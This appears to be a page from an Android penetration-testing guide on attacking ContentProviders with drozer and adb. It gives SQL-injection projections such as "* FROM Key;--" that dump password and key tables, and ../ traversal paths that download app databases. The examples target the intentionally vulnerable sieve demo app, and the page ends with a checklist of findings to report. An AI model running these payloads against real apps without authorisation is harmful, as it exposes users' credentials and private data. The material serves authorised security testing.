3.4.2 ContentProvider

DROZER

Info:

run app.provider.info -a com.x.x.x

Path guessing & determining accessible content:

run scanner.provider.finduris -a com.x.x.x

Use URIs from above or guess yourself: (in addition: .insert / .update / .delete)

run app.provider.query content://<URI> --vertical

Test content providers for SQL-Injection:

run scanner.provider.injection -a com.x.x.x

Find tables accessible through SQL-Injection:

run scanner.provider.sqltables -a com.x.x.x

SQLi

list all db tables

run app.provider.query content://com.x.x.x.ProviderName/path/ --prjection "* FROM SQLITE_MASTER WHERE type='table';--"
run app.provider.query content://com.x.x.x.ProviderName/path/ --projection "'" unrecognized token: "' FROM Passwords" (code 1): , while compiling: SELECT ' FROM Passwords
run app.provider.query content://com.x.x.x.ProviderName/path/ --selection "'" unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')

Example - retrieve data from otherwise protected tables:

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"

FILESYSTEM-CP

Download db:

run app.provider.download content://com.x.x.x.ProviderName/../../../../../../../../data/data/com.x.x.x/database.db /home/user/database.db

Find content provider that are susceptible to directory-traversal:

run scanner.provider.traversal -a com.x.x.x
run app.provider.read content://com.x.x.x.ProviderName/path/to/file

Example (/etc/hosts is world-readable -> no biggy)

run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts

or

run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db

ADB

adb shell content query --uri content:/com.x.x.x.ProviderName/file_or_path

THINGS TO REPORT

  • Inproper use of permissions (no path permissions, no READ/WRITE permissions)

  • If SQL Injection is possible

    • If weak hash-function was used (like MD5) on passwords or other sensitive data

  • Accessed db-files

Previous3.4.1 ActivitiesNext3.4.3 Services

Last updated

Was this helpful?